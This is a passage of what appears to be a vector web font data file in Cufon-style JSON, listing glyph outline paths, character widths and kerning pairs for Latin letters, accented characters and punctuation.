12,-71v0,-67,98,-71,145,-45v-2,11,3,28,-2,35v-14,-12,-41,-22,-66,-22","w":187},{"d":"211,0r-44,0r-79,-86r-21,20r0,66r-33,0r0,-196r33,0r0,98r95,-98r42,0r-91,90","w":213},{"d":"269,64v-53,15,-112,-3,-111,-60v-91,7,-138,-47,-138,-135v0,-82,40,-136,122,-136v82,0,121,52,121,136v1,63,-28,110,-72,127v-3,44,42,47,78,36r0,32xm142,-25v57,0,85,-44,85,-106v0,-62,-28,-106,-85,-106v-58,0,-86,43,-86,106v0,62,28,106,86,106","w":283,"k":{"\u2026":5,".":5,",":5}},{"d":"94,-130r-59,0r0,-25r59,0r0,-76r-94,0r0,-31r222,0r0,31r-94,0r0,76r59,0r0,25r-59,0r0,130r-34,0r0,-130","w":221},{"d":"226,0r-204,0r0,-32r161,-199r-155,0r0,-31r195,0r0,32r-163,199r166,0r0,31xm170,-361r-48,66r-26,0r32,-66r42,0","w":246},{"d":"174,-228r-28,0r-33,-45r-32,45r-27,0r40,-67r40,0xm19,-100v0,-81,74,-124,140,-88r2,-8r31,0r0,174v8,89,-75,110,-152,88v1,-11,-2,-25,1,-34v40,18,126,24,118,-41r0,-18v-20,15,-32,24,-64,24v-50,0,-76,-42,-76,-97xm103,-34v23,1,42,-10,56,-20r0,-107v-48,-26,-110,-5,-106,60v3,41,12,66,50,67","w":224},{"d":"67,-55v-1,33,40,34,67,24r0,29v-52,16,-101,0,-101,-62r0,-105r-22,0r0,-27r22,0r0,-57r33,0r0,57r68,0r0,27r-68,0xm156,-316r-44,87r-22,0r27,-87r39,0","w":141},{"d":"145,20r-31,54r-25,0r17,-54r39,0xm212,-207v-30,-30,-151,-51,-151,12v0,82,166,11,164,120v-1,92,-134,93,-201,59v2,-14,-4,-34,2,-44v33,36,155,60,163,-10v-9,-80,-164,-12,-164,-122v0,-82,129,-87,190,-56r0,41r-3,0","w":246},{"d":"128,-184v17,6,40,15,40,40v0,60,-88,58,-132,41r0,-31v23,13,102,33,102,-9v0,-30,-35,-26,-66,-26r0,-25v30,1,63,2,61,-25v-4,-40,-74,-18,-94,-6r0,-31v40,-17,123,-19,124,31v0,23,-16,36,-35,41","w":195},{"d":"100,-274r-48,99r-24,0r29,-99r43,0","w":96,"k":{"\u2026":37,"\u00c6":18,"t":-7,"s":12,"Y":-19,"W":-11,"V":-18,"T":-19,"A":18,".":37,",":37}},{"d":"145,-143v32,7,56,25,57,65v3,86,-108,98,-173,67r0,-37v39,27,138,41,137,-32v0,-41,-32,-49,-76,-47r0,-30v38,2,71,-8,71,-43v0,-58,-93,-35,-124,-14r0,-37v50,-24,159,-28,159,47v0,30,-25,53,-51,58r0,3","w":228},{"d":"265,-195r-30,0r0,195r-34,0r0,-128r-131,0r0,128r-35,0r0,-195r-29,0r0,-25r29,0r0,-42r35,0r0,42r131,0r0,-42r34,0r0,42r30,0r0,25xm201,-159r0,-36r-131,0r0,36r131,0","w":270},{"d":"101,-50r-49,115r-26,0r30,-115r45,0","w":130,"k":{"\u2019":37,"\u201d":37}},{"d":"35,-262v86,-2,173,-5,171,79v-2,70,-56,91,-136,85r0,98r-35,0r0,-262xm70,-127v55,2,100,-3,100,-55v0,-50,-48,-52,-100,-50r0,105","w":217,"k":{"\u0153":9,"\u2026":53,"\u00f8":9,"\u00e6":9,"\u00c6":12,"o":9,"e":9,"a":9,"Y":-4,"A":9,".":53,",":53}},{"d":"132,-24v48,0,65,-27,65,-78r0,-160r35,0r0,157v1,71,-30,110,-100,110v-71,0,-100,-39,-101,-110r0,-157r35,0r0,159v-1,51,18,79,66,79xm164,-295r-26,0r-48,-66r42,0","w":263},{"d":"220,-262r-92,147r0,115r-34,0r0,-111r-93,-151r39,0r71,117r72,-117r37,0xm164,-361r-48,66r-26,0r32,-66r42,0","w":221},{"d":"121,69r-91,0r0,-25r61,0r0,-292r-61,0r0,-26r91,0r0,343","w":163},{"d":"263,0r-36,0r0,-39r36,0r0,39xm165,0r-36,0r0,-39r36,0r0,39xm67,0r-36,0r0,-39r36,0r0,39","w":294,"k":{"\u2019":37,"\u201d":37}},{"d":"179,-295r-40,67r-40,0r-40,-67r28,0r32,45r33,-45r27,0xm131,-202v90,-3,62,118,66,202r-33,0r0,-112v-1,-34,-5,-60,-42,-58v-22,1,-42,11,-56,23r0,147r-33,0r0,-196r33,0r0,21v18,-14,37,-26,65,-27"},{"d":"211,-294r-28,0r-32,-45r-33,45r-27,0r40,-66r40,0xm56,-132v0,91,85,129,163,95r0,-64r-70,0r0,-31r104,0r0,113v-25,12,-60,24,-95,24v-89,-1,-138,-47,-138,-136v0,-84,53,-136,138,-135v38,0,65,9,95,23r0,41v-29,-15,-55,-35,-101,-35v-60,0,-96,44,-96,105","w":279},{"d":"150,-274r-44,89r-23,0r27,-89r40,0xm66,0r-33,0r0,-274r33,0r0,274","w":106},{"d":"157,-139v25,16,50,28,50,66v0,48,-44,79,-93,79v-52,0,-93,-31,-93,-78v0,-35,24,-55,49,-69v-24,-14,-42,-26,-42,-58v0,-42,41,-69,86,-69v46,0,87,25,86,67v-1,29,-19,52,-43,62xm135,-148v21,-14,30,-25,31,-53v1,-27,-25,-39,-52,-41v-51,-4,-68,59,-22,77v10,4,29,14,43,17xm115,-20v43,3,72,-42,49,-76v-12,-19,-45,-25,-72,-36v-19,11,-34,31,-35,57v-1,33,26,53,58,55","w":228},{"d":"172,-178v52,53,30,191,-63,183v-22,-2,-37,-4,-50,-14r-23,35r-20,0r30,-45v-51,-53,-29,-183,63,-183v21,0,37,7,50,14r20,-30r20,0xm143,-163v-54,-36,-110,23,-88,95v2,9,5,16,9,22xm75,-33v64,42,119,-48,79,-118","w":218,"k":{"\u2026":4,"y":3,"x":4,"v":3,".":4,",":5}},{"d":"137,-99r-110,0r0,-31r110,0r0,31","w":163,"k":{"\u00e6":4,"\u00c6":9,"z":7,"y":7,"x":9,"w":4,"v":7,"a":4,"Z":5,"Y":25,"X":14,"W":9,"V":9,"T":26,"S":4,"J":18,"I":5,"A":9}},{"d":"136,-274r-8,102r-23,0r-8,-102r39,0xm68,-274r-8,102r-23,0r-7,-102r38,0","w":165},{"d":"36,-192v43,-13,121,-16,138,23v15,-18,38,-33,70,-33v57,1,87,40,82,104r-144,0v-9,84,94,86,140,50r0,36v-45,24,-130,23,-154,-20v-19,19,-45,37,-86,37v-35,0,-64,-26,-64,-61v1,-66,68,-66,134,-68v8,-65,-75,-51,-116,-35r0,-33xm294,-124v3,-49,-58,-65,-91,-37v-11,9,-17,21,-20,37r111,0xm52,-58v0,53,86,31,105,6v-4,-12,-7,-29,-7,-46v-44,2,-98,-3,-98,40xm232,-295r-48,66r-26,0r32,-66r42,0","w":343},{"d":"246,0r-46,0r-103,-117r-26,28r0,89r-35,0r0,-262r35,0r0,137r127,-137r42,0r-117,123xm61,42v33,14,81,4,64,-46r27,0v14,59,-33,91,-91,74r0,-28","w":249},{"d":"242,-262r-96,262r-46,0r-95,-262r37,0r82,231r82,-231r36,0","w":246,"k":{"\u2014":9,"\u2013":9,"\u0153":18,"\u2026":51,"\u00f8":18,"\u00e6":18,"\u00c6":12,"y":11,"u":11,"o":18,"e":18,"a":18,"A":11,";":14,":":14,".":51,"-":9,",":51}},{"d":"202,-360r-40,66r-40,0r-40,-66r28,0r33,45r32,-45r27,0xm235,0r-43,0r-124,-234r0,234r-33,0r0,-262r54,0r113,214r0,-214r33,0r0,262","w":269},{"d":"132,20r-31,54r-26,0r18,-54r39,0xm222,-231r-94,0r0,231r-34,0r0,-231r-94,0r0,-31r222,0r0,31","w":221},{"d":"131,-202v90,-3,62,118,66,202r-33,0r0,-112v-1,-34,-5,-60,-42,-58v-22,1,-42,11,-56,23r0,147r-33,0r0,-223r-30,0r0,-23r30,0r0,-28r33,0r0,28r56,0r0,23r-56,0r0,48v18,-14,37,-26,65,-27"},{"d":"134,-229r-26,0r-48,-66r42,0","w":228},{"d":"149,-294r-28,0r-33,-45r-32,45r-28,0r41,-66r39,0xm8,-34v41,15,88,12,88,-47r0,-153r-55,0r0,-28r90,0r0,194v2,65,-61,81,-123,67r0,-33","w":163},{"d":"173,-228r-28,0r-32,-45r-32,45r-28,0r40,-67r40,0xm52,-95v-6,81,97,83,141,47r0,36v-72,38,-174,10,-174,-85v0,-61,37,-105,95,-105v60,0,87,41,83,107r-145,0xm165,-120v7,-54,-64,-70,-95,-39v-10,10,-17,24,-18,39r113,0","w":214},{"d":"169,53r-31,0r-126,-327r31,0","w":163},{"d":"52,-95v-6,81,97,83,141,47r0,36v-72,38,-174,10,-174,-85v0,-61,37,-105,95,-105v60,0,87,41,83,107r-145,0xm165,-120v7,-54,-64,-70,-95,-39v-10,10,-17,24,-18,39r113,0","w":214,"k":{"T":25}},{"d":"169,-228r-28,0r-33,-45r-32,45r-27,0r40,-67r40,0xm36,-192v59,-16,149,-18,149,59r0,133r-33,0r0,-21v-18,12,-36,26,-70,26v-36,0,-64,-27,-64,-62v1,-67,68,-69,134,-73v4,-60,-77,-42,-116,-29r0,-33xm52,-59v0,51,80,35,100,11r0,-55v-41,5,-100,-1,-100,44","w":216},{"d":"279,-196r-51,196r-30,0r-51,-151r-50,151r-30,0r-52,-196r35,0r36,152r49,-152r27,0r50,152r34,-152r33,0","w":294,"k":{"\u2014":4,"\u2013":4,"\u2026":12,"\u00e6":4,"a":4,".":12,"-":4,",":12}},{"d":"34,-196v-6,-65,43,-89,104,-76v-2,9,3,25,-2,30v-36,-10,-78,-3,-70,46r60,0r0,27r-59,0r0,169r-33,0r0,-169r-22,0r0,-27r22,0","w":126,"k":{"\u2019":-9,"\u201d":-9,"\u2014":9,"\u2013":9,"\u2026":21,"}":-18,"y":2,"]":-18,"\\":-18,"?":-19,".":21,"-":9,",":23,"*":-9,")":-18,"'":-11,"\"":-11}},{"d":"199,-196v34,4,32,-31,23,-52r28,0v14,43,-6,80,-55,75r0,173r-33,0r0,-22v-20,14,-35,26,-65,27v-91,4,-61,-117,-66,-201r33,0v8,63,-27,170,42,170v22,0,41,-12,56,-24r0,-146r37,0","w":237},{"d":"169,-274r-48,99r-24,0r29,-99r43,0xm98,-274r-48,99r-24,0r29,-99r43,0","w":165,"k":{"\u2026":37,"\u00c6":18,"t":-7,"s":12,"Y":-19,"W":-11,"V":-18,"T":-19,"A":18,".":37,",":37}},{"d":"208,0r-173,0r0,-262r173,0r0,31r-138,0r0,72r138,0r0,31r-138,0r0,97r138,0r0,31"},{"d":"182,-294r-28,0r-33,-45r-32,45r-27,0r40,-66r40,0xm242,0r-38,0r-25,-73r-113,0r-26,73r-35,0r95,-262r46,0xm168,-103r-46,-128r-46,128r92,0","w":246},{"d":"286,-314v16,41,-7,80,-54,76r0,133v1,71,-30,110,-100,110v-71,0,-100,-39,-101,-110r0,-157r35,0r0,159v-1,51,18,79,66,79v48,0,65,-27,65,-78r0,-160v29,-2,67,9,67,-24v0,-9,-5,-20,-6,-28r28,0","w":272},{"d":"20,45v33,1,39,-23,39,-55r0,-159r-41,0r0,-27r74,0r0,201v4,59,-50,80,-103,64v2,-9,-3,-25,2,-31v6,2,21,7,29,7xm121,-228r-28,0r-33,-45r-32,45r-27,0r40,-67r40,0","w":123},{"w":126},{"d":"207,-228r-28,0r-32,-45r-32,45r-28,0r40,-67r40,0xm279,-196r-51,196r-30,0r-51,-151r-50,151r-30,0r-52,-196r35,0r36,152r49,-152r27,0r50,152r34,-152r33,0","w":294},{"d":"188,-294r-28,0r-33,-45r-32,45r-27,0r40,-66r39,0xm212,-207v-30,-30,-151,-51,-151,12v0,82,166,11,164,120v-1,92,-134,93,-201,59v2,-14,-4,-34,2,-44v33,36,155,60,163,-10v-9,-80,-164,-12,-164,-122v0,-82,129,-87,190,-56r0,41r-3,0","w":246},{"d":"250,-104r-203,90r0,-31r160,-70r-160,-69r0,-32r203,90r0,22","w":294},{"d":"204,-294r-28,0r-32,-45r-33,45r-27,0r40,-66r40,0xm147,-25v40,1,64,-18,90,-35r0,41v-26,11,-51,24,-89,24v-85,0,-128,-50,-128,-136v0,-85,44,-135,129,-135v36,0,59,8,88,23v-2,13,4,32,-2,41v-25,-20,-49,-36,-89,-35v-61,2,-90,42,-90,106v0,64,31,104,91,106","w":251},{"d":"123,-316v25,0,34,-18,37,-44r29,0v4,59,-75,89,-113,48v-12,-13,-18,-28,-19,-48r29,0v3,26,11,44,37,44xm242,0r-38,0r-25,-73r-113,0r-26,73r-35,0r95,-262r46,0xm168,-103r-46,-128r-46,128r92,0","w":246},{"d":"127,0r-103,0r0,-27r34,0r0,-208r-34,0r0,-27r103,0r0,27r-34,0r0,208r34,0r0,27xm158,-34v41,15,88,12,88,-47r0,-153r-55,0r0,-28r90,0r0,194v2,65,-61,81,-123,67r0,-33","w":313},{"w":126},{"d":"114,-250v25,0,34,-19,37,-45r29,0v4,59,-74,91,-113,49v-12,-13,-18,-29,-19,-49r29,0v3,26,12,45,37,45xm19,-100v0,-81,74,-124,140,-88r2,-8r31,0r0,174v8,89,-75,110,-152,88v1,-11,-2,-25,1,-34v40,18,126,24,118,-41r0,-18v-20,15,-32,24,-64,24v-50,0,-76,-42,-76,-97xm103,-34v23,1,42,-10,56,-20r0,-107v-48,-26,-110,-5,-106,60v3,41,12,66,50,67","w":224},{"d":"114,-250v25,0,34,-19,37,-45r29,0v4,59,-74,91,-113,49v-12,-13,-18,-29,-19,-49r29,0v3,26,12,45,37,45xm52,-95v-6,81,97,83,141,47r0,36v-72,38,-174,10,-174,-85v0,-61,37,-105,95,-105v60,0,87,41,83,107r-145,0xm165,-120v7,-54,-64,-70,-95,-39v-10,10,-17,24,-18,39r113,0","w":214},{"d":"142,-316v25,0,34,-18,37,-44r29,0v4,59,-75,89,-113,48v-12,-13,-18,-28,-19,-48r29,0v2,27,11,44,37,44xm142,-267v82,0,121,52,121,136v0,84,-40,136,-121,136v-82,0,-122,-53,-122,-136v0,-82,40,-136,122,-136xm142,-25v57,0,85,-44,85,-106v0,-62,-28,-106,-85,-106v-58,0,-86,43,-86,106v0,62,28,106,86,106","w":283},{"d":"113,-24v28,0,46,-16,65,-25r0,37v-13,5,-31,4,-23,28v3,50,-46,67,-93,54v1,-9,-3,-23,2,-28v27,13,77,5,63,-39v-70,6,-109,-32,-109,-101v0,-88,90,-126,160,-87v-2,11,3,29,-2,37v-16,-14,-38,-23,-63,-24v-40,0,-60,30,-60,74v0,44,20,74,60,74","w":187,"k":{"\u2014":4,"\u2013":4,"-":4}},{"d":"36,-192v59,-16,149,-18,149,59r0,133r-33,0r0,-21v-18,12,-36,26,-70,26v-36,0,-64,-27,-64,-62v1,-67,68,-69,134,-73v4,-60,-77,-42,-116,-29r0,-33xm52,-59v0,51,80,35,100,11r0,-55v-41,5,-100,-1,-100,44","w":216,"k":{"y":3,"w":2,"v":3}},{"d":"258,-101r-96,0r0,96r-29,0r0,-96r-96,0r0,-28r96,0r0,-95r29,0r0,95r96,0r0,28","w":294},{"d":"169,-228r-28,0r-32,-45r-33,45r-27,0r40,-67r40,0xm109,-202v58,0,91,44,91,104v0,59,-32,103,-91,103v-59,0,-90,-43,-90,-103v0,-60,32,-104,90,-104xm109,-23v40,0,57,-31,57,-75v0,-45,-16,-75,-57,-75v-40,0,-56,30,-56,75v0,44,16,75,56,75","w":218},{"d":"178,-235r-130,0r0,-27r130,0r0,27xm52,-95v-6,81,97,83,141,47r0,36v-72,38,-174,10,-174,-85v0,-61,37,-105,95,-105v60,0,87,41,83,107r-145,0xm165,-120v7,-54,-64,-70,-95,-39v-10,10,-17,24,-18,39r113,0","w":214},{"d":"187,-360r-40,66r-40,0r-40,-66r28,0r33,45r32,-45r27,0xm212,-207v-30,-30,-151,-51,-151,12v0,82,166,11,164,120v-1,92,-134,93,-201,59v2,-14,-4,-34,2,-44v33,36,155,60,163,-10v-9,-80,-164,-12,-164,-122v0,-82,129,-87,190,-56r0,41r-3,0","w":246},{"d":"175,-235r-131,0r0,-27r131,0r0,27xm109,-202v58,0,91,44,91,104v0,59,-32,103,-91,103v-59,0,-90,-43,-90,-103v0,-60,32,-104,90,-104xm109,-23v40,0,57,-31,57,-75v0,-45,-16,-75,-57,-75v-40,0,-56,30,-56,75v0,44,16,75,56,75","w":218},{"d":"172,-178v52,53,30,191,-63,183v-22,-2,-37,-4,-50,-14r-23,35r-20,0r30,-45v-51,-53,-29,-183,63,-183v21,0,37,7,50,14r20,-30r20,0xm143,-163v-54,-36,-110,23,-88,95v2,9,5,16,9,22xm75,-33v64,42,119,-48,79,-118xm164,-295r-48,66r-26,0r32,-66r42,0","w":218},{"d":"1,42v30,13,68,4,57,-42r-25,0r0,-274r33,0r0,270v9,1,22,-4,20,8v6,56,-34,81,-85,66r0,-28","w":98},{"d":"159,-295r-40,67r-40,0r-40,-67r28,0r33,45r32,-45r27,0xm97,-173v-31,0,-56,25,-35,46v35,22,111,10,111,70v0,69,-107,74,-154,45v2,-11,-3,-29,2,-37v17,13,44,24,72,26v35,3,58,-23,39,-47v-35,-21,-112,-12,-112,-71v0,-67,98,-71,145,-45v-2,11,3,28,-2,35v-14,-12,-41,-22,-66,-22","w":187},{"d":"142,-25v37,1,51,-11,74,-22r0,36v-78,41,-183,-1,-192,-83r-24,0r8,-21r13,0v0,-11,-2,-23,0,-34r-21,0r8,-20r16,0v9,-80,116,-122,192,-82r0,36v-32,-20,-89,-35,-124,-4v-15,13,-25,29,-31,50r83,0r-7,20r-80,0v-1,12,0,22,0,34r67,0r-8,21r-55,0v9,37,40,67,81,69","w":228},{"d":"70,-214v74,-3,136,6,136,76v0,69,-59,86,-136,81r0,57r-35,0r0,-262r35,0r0,48xm70,-86v53,2,100,-1,100,-51v0,-50,-49,-49,-100,-48r0,99","w":217},{"d":"131,-229r-37,0r0,-34r37,0r0,34xm19,-100v0,-81,74,-124,140,-88r2,-8r31,0r0,174v8,89,-75,110,-152,88v1,-11,-2,-25,1,-34v40,18,126,24,118,-41r0,-18v-20,15,-32,24,-64,24v-50,0,-76,-42,-76,-97xm103,-34v23,1,42,-10,56,-20r0,-107v-48,-26,-110,-5,-106,60v3,41,12,66,50,67","w":224},{"d":"163,0v-15,41,25,57,53,41r0,28v-50,16,-98,-15,-81,-69r-100,0r0,-262r173,0r0,31r-138,0r0,72r138,0r0,31r-138,0r0,97r138,0r0,31r-45,0"},{"d":"184,-301v0,26,-15,46,-34,54r92,247r-38,0r-26,-73r-112,0r-26,73r-35,0r91,-247v-19,-10,-34,-28,-35,-54v-1,-34,29,-59,62,-59v33,0,61,25,61,59xm123,-265v20,0,35,-16,35,-36v0,-19,-16,-35,-35,-35v-19,0,-35,16,-35,35v0,20,15,36,35,36xm168,-103r-46,-126r-45,126r91,0","w":246},{"d":"168,-228r-28,0r-32,-45r-32,45r-28,0r40,-67r40,0xm202,-196r-114,268r-36,0r37,-81r-78,-187r36,0r60,145r61,-145r34,0","w":213},{"d":"133,-229r-37,0r0,-34r37,0r0,34xm52,-95v-6,81,97,83,141,47r0,36v-72,38,-174,10,-174,-85v0,-61,37,-105,95,-105v60,0,87,41,83,107r-145,0xm165,-120v7,-54,-64,-70,-95,-39v-10,10,-17,24,-18,39r113,0","w":214},{"d":"132,-24v48,0,65,-27,65,-78r0,-160r35,0r0,157v1,71,-30,110,-100,110v-71,0,-100,-39,-101,-110r0,-157r35,0r0,159v-1,51,18,79,66,79","w":263,"k":{"\u2026":4,"\u00c6":4,"A":2,".":4,",":4}},{"d":"36,-192v59,-16,149,-18,149,59r0,133r-33,0r0,-21v-18,12,-36,26,-70,26v-36,0,-64,-27,-64,-62v1,-67,68,-69,134,-73v4,-60,-77,-42,-116,-29r0,-33xm52,-59v0,51,80,35,100,11r0,-55v-41,5,-100,-1,-100,44xm162,-229r-35,0r0,-34r35,0r0,34xm90,-229r-35,0r0,-34r35,0r0,34","w":216},{"d":"252,-137r-209,0r0,-29r209,0r0,29xm252,-64r-209,0r0,-28r209,0r0,28","w":294},{"d":"131,-202v90,-3,62,118,66,202r-33,0r0,-112v-1,-34,-5,-60,-42,-58v-22,1,-42,11,-56,23r0,147r-33,0r0,-196r33,0r0,21v18,-14,37,-26,65,-27xm41,42v33,14,81,4,64,-46r27,0v14,59,-33,91,-91,74r0,-28"},{"d":"226,-236v23,24,38,56,37,105v-1,84,-40,136,-121,136v-27,0,-53,-7,-70,-19r-28,40r-23,0r36,-52v-24,-23,-37,-59,-37,-105v0,-82,40,-134,122,-136v30,0,49,7,69,19r25,-35r23,0xm142,-237v-91,0,-105,121,-66,184r117,-168v-13,-10,-28,-16,-51,-16xm142,-24v89,0,105,-121,65,-184r-117,168v14,10,29,16,52,16xm190,-361r-48,66r-26,0r32,-66r42,0","w":283},{"d":"202,-231r-132,0r0,74r114,0r0,31r-114,0r0,126r-35,0r0,-262r167,0r0,31","w":206,"k":{"\u0153":9,"\u2026":53,"\u00f8":9,"\u00e6":18,"\u00c6":19,"o":9,"e":9,"a":18,"T":-5,"A":18,"?":-11,";":11,":":11,".":53,",":53}},{"d":"268,0r-35,0r0,-226r-72,154r-21,0r-72,-154r0,226r-33,0r0,-262r48,0r69,146r68,-146r48,0r0,262","w":303},{"d":"160,-228r-28,0r-32,-45r-32,45r-28,0r40,-67r40,0xm97,-173v-31,0,-56,25,-35,46v35,22,111,10,111,70v0,69,-107,74,-154,45v2,-11,-3,-29,2,-37v17,13,44,24,72,26v35,3,58,-23,39,-47v-35,-21,-112,-12,-112,-71v0,-67,98,-71,145,-45v-2,11,3,28,-2,35v-14,-12,-41,-22,-66,-22","w":187},{"d":"19,-98v0,-82,72,-127,140,-90r2,-8r31,0r0,268r-33,0r0,-94v-18,15,-35,26,-63,26v-51,0,-77,-45,-77,-102xm103,-28v23,0,42,-10,56,-22r0,-111v-49,-27,-111,-3,-106,62v3,42,12,70,50,71","w":224},{"d":"222,-231r-94,0r0,231r-34,0r0,-231r-94,0r0,-31r222,0r0,31","w":221,"k":{"\u2014":26,"\u2013":26,"\u0153":39,"\u0152":9,"\u2026":51,"\u00f8":39,"\u00e6":42,"\u00d8":9,"\u00c6":23,"\u00c7":7,"z":30,"y":35,"w":35,"v":35,"u":35,"s":32,"r":35,"o":39,"g":37,"e":39,"c":39,"a":42,"T":12,"S":2,"O":9,"G":7,"C":7,"A":21,"?":-11,";":35,":":35,".":51,"-":26,",":51}},{"d":"260,-164r-58,0r-16,66r54,0r0,24r-61,0r-18,74r-22,0r18,-74r-48,0r-18,74r-23,0r19,-74r-53,0r0,-24r59,0r16,-66r-54,0r0,-24r60,0r19,-74r22,0r-18,74r47,0r19,-74r22,0r-18,74r52,0r0,24xm180,-164r-49,0r-16,67r48,0","w":294},{"d":"41,-259v49,-15,125,-13,125,49r0,113r-30,0r0,-17v-29,33,-111,26,-109,-32v2,-57,55,-59,109,-62v3,-49,-67,-30,-95,-21r0,-30xm57,-148v0,42,64,26,79,8r0,-43v-33,3,-79,0,-79,35","w":196},{"d":"131,-202v90,-3,62,118,66,202r-33,0r0,-112v-1,-34,-5,-60,-42,-58v-22,1,-42,11,-56,23r0,147r-33,0r0,-274r33,0r0,99v18,-14,37,-26,65,-27","k":{"y":4,"w":2,"v":4}},{"d":"86,-90r-42,0r0,-50r42,0r0,50","w":130},{"d":"256,-10r-30,0r0,-96r-189,0r0,-28r219,0r0,124","w":294},{"d":"226,0r-204,0r0,-32r161,-199r-155,0r0,-31r195,0r0,32r-163,199r166,0r0,31","w":246,"k":{"\u2014":9,"\u2013":9,"\u0153":11,"\u0152":4,"\u00f8":11,"\u00e6":9,"\u00d8":4,"\u00c7":4,"y":11,"w":7,"o":11,"e":11,"a":9,"Z":2,"O":4,"G":4,"C":4,"-":11}},{"d":"201,0r-166,0r0,-262r35,0r0,231r131,0r0,31xm173,-91r-41,0r0,-47r41,0r0,47","w":200},{"d":"203,-295r-46,66r-24,0r30,-66r40,0xm132,-295r-46,66r-24,0r30,-66r40,0xm106,-26v22,0,41,-12,56,-24r0,-146r33,0r0,196r-33,0r0,-22v-20,14,-35,26,-65,27v-91,4,-61,-117,-66,-201r33,0v8,63,-27,170,42,170"},{"d":"52,-95v-6,81,97,83,141,47r0,36v-17,7,-34,14,-54,16v-11,39,25,52,54,37r0,28v-48,15,-95,-11,-82,-65v-58,-4,-92,-40,-92,-101v0,-61,37,-105,95,-105v60,0,87,41,83,107r-145,0xm165,-120v7,-54,-64,-70,-95,-39v-10,10,-17,24,-18,39r113,0","w":214},{"d":"66,0r-33,0r0,-196r33,0r0,196xm70,-257v10,0,12,-12,12,-24r19,0v1,26,-10,45,-32,46v-21,1,-23,-20,-40,-22v-10,1,-12,10,-12,23r-19,0v-1,-25,10,-44,32,-45v21,-1,23,22,40,22","w":98},{"d":"202,-196r-114,268r-36,0r37,-81r-78,-187r36,0r60,145r61,-145r34,0","w":213,"k":{"\u2014":7,"\u2013":7,"\u0153":3,"\u2026":32,"\u00f8":3,"\u00e6":7,"\u00e7":3,"q":2,"o":3,"g":2,"e":3,"d":2,"c":3,"a":7,".":33,"-":7,",":33}},{"d":"168,-180r-42,0r0,-48r42,0r0,48xm258,-101r-221,0r0,-28r221,0r0,28xm168,-1r-42,0r0,-49r42,0r0,49","w":294},{"d":"200,-156r-11,19r-64,-37r1,63r-23,0r1,-63r-63,38r-12,-20r67,-36r-67,-37r12,-19r63,38r-1,-64r23,0r-1,64r64,-38r11,20r-67,36","w":228},{"d":"68,-229r-37,0r0,-34r37,0r0,34xm76,73v-47,4,-61,-52,-43,-87r0,-182r33,0r0,196v-14,-3,-12,8,-13,19v-3,29,28,32,49,23r0,28","w":98},{"d":"19,-100v0,-81,74,-124,140,-88r2,-8r31,0r0,174v8,89,-75,110,-152,88v1,-11,-2,-25,1,-34v40,18,126,24,118,-41r0,-18v-20,15,-32,24,-64,24v-50,0,-76,-42,-76,-97xm103,-34v23,1,42,-10,56,-20r0,-107v-48,-26,-110,-5,-106,60v3,41,12,66,50,67xm156,-295r-32,66r-42,0r48,-66r26,0","w":224},{"d":"92,42v28,12,78,8,65,-37v-88,-1,-137,-47,-137,-136v0,-84,53,-136,138,-135v38,0,65,9,95,23r0,41v-29,-15,-55,-35,-101,-35v-60,0,-96,44,-96,105v0,91,85,129,163,95r0,-64r-70,0r0,-31r104,0r0,113v-20,9,-45,18,-69,22v10,57,-39,82,-92,67r0,-28","w":279},{"d":"111,-267v68,3,93,47,94,120v1,102,-55,167,-160,148v2,-10,-3,-27,2,-34v61,26,124,-17,122,-80v-55,38,-149,17,-149,-64v0,-52,41,-92,91,-90xm56,-178v0,63,75,65,113,40v4,-54,-8,-100,-59,-100v-35,0,-54,24,-54,60","w":228},{"d":"230,-293r-230,0r-1,-21r231,0r0,21","w":228},{"d":"67,-55v-1,33,40,34,67,24r0,29v-52,16,-101,0,-101,-62r0,-105r-22,0r0,-27r22,0r0,-57r33,0r0,57r68,0r0,27r-68,0","w":141,"k":{"\u2019":-4,"\u201d":-4,"\u2014":7,"\u2013":7,"y":2,"-":7}},{"d":"202,-196r-114,268r-36,0r37,-81r-78,-187r36,0r60,145r61,-145r34,0xm162,-229r-35,0r0,-34r35,0r0,34xm90,-229r-35,0r0,-34r35,0r0,34","w":213},{"d":"169,-295r-37,0r0,-34r37,0r0,34xm56,-132v0,91,85,129,163,95r0,-64r-70,0r0,-31r104,0r0,113v-25,12,-60,24,-95,24v-89,-1,-138,-47,-138,-136v0,-84,53,-136,138,-135v38,0,65,9,95,23r0,41v-29,-15,-55,-35,-101,-35v-60,0,-96,44,-96,105","w":279},{"d":"147,-256v14,0,19,-14,19,-29r23,0v-2,31,-15,53,-45,54v-28,1,-36,-28,-59,-28v-14,0,-19,13,-19,29r-23,0v1,-31,16,-53,44,-54v27,-1,37,28,60,28xm106,-26v22,0,41,-12,56,-24r0,-146r33,0r0,196r-33,0r0,-22v-20,14,-35,26,-65,27v-91,4,-61,-117,-66,-201r33,0v8,63,-27,170,42,170"},{"d":"230,53r-231,0r0,-21r231,0r0,21","w":228},{"d":"94,-229r-38,0r0,-34r38,0r0,34xm20,45v33,1,39,-23,39,-55r0,-159r-41,0r0,-27r74,0r0,201v4,59,-50,80,-103,64v2,-9,-3,-25,2,-31v6,2,21,7,29,7","w":123},{"d":"262,-120r-35,0r-80,-110r-80,110r-34,0r103,-142r22,0","w":294},{"d":"132,-360v33,0,61,25,61,59v0,33,-28,60,-61,60v-33,0,-62,-27,-62,-60v0,-34,29,-59,62,-59xm132,-265v20,0,36,-16,36,-36v0,-20,-17,-36,-36,-36v-19,0,-36,16,-36,36v0,20,16,36,36,36xm132,-24v48,0,65,-27,65,-78r0,-160r35,0r0,157v1,71,-30,110,-100,110v-71,0,-100,-39,-101,-110r0,-157r35,0r0,159v-1,51,18,79,66,79","w":263},{"d":"109,-202v58,0,91,44,91,104v0,59,-32,103,-91,103v-59,0,-90,-43,-90,-103v0,-60,32,-104,90,-104xm109,-23v40,0,57,-31,57,-75v0,-45,-16,-75,-57,-75v-40,0,-56,30,-56,75v0,44,16,75,56,75xm164,-295r-48,66r-26,0r32,-66r42,0","w":218},{"d":"188,-223v-31,-18,-137,-30,-114,33v32,35,124,15,124,84v0,30,-19,45,-38,58v20,10,33,24,33,50v0,68,-94,77,-153,55v2,-10,-3,-27,2,-34v33,22,135,27,113,-32v-33,-35,-125,-17,-125,-85v0,-28,20,-45,38,-58v-21,-9,-32,-25,-32,-50v-1,-69,95,-75,152,-55r0,34xm136,-56v28,-7,42,-61,6,-74v-17,-6,-32,-7,-50,-14v-26,8,-44,62,-6,74v17,5,31,9,50,14","w":228},{"d":"256,-202v89,-3,57,120,63,202r-33,0r0,-112v1,-33,-4,-60,-39,-58v-23,0,-40,13,-56,24r1,146r-33,0r0,-112v0,-33,-3,-60,-39,-58v-23,1,-39,11,-54,23r0,14